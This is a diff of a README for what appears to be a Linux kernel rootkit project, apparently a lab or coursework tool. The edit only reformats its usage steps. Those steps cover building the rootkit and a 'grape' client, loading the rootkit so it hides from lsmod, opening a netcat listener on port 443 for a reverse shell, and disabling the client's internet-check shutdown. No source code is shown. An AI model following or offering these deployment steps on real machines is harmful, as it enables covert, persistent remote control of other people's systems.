asuar078/raisin/README.md

 1. Run `make` to create rootkit and grape client.
 Will need to install build essentials if not already installed `apt-get install build-essential`
-2. Load the rootkit using `sudo insmod rootkit.ko`, the rootkit will hide itself so it can't be seen with `lsmod` till the `unhide` command is given.
+2. Load the rootkit using `sudo insmod rootkit.ko`.
+The rootkit will hide itself so it can't be seen with `lsmod` till the `unhide` command is given.
 3. Open a listener for the reverse shell using `sudo nc -lvp 443`.
-On the default build target IP is set for default VM IP of `10.0.2.15`.
+The default build target IP is set for default VM IP of `10.0.2.15`.
-4. Start the grape client `./grape`, if no internet access is available grape will shutdown.
+4. Start the grape client `./grape`.
+If no internet access is available grape will shutdown.
 If you wish to remove this simple delete line `74-75` in grape.c and recompile.
 5. The reverse shell is now active and can be used to send commands to the host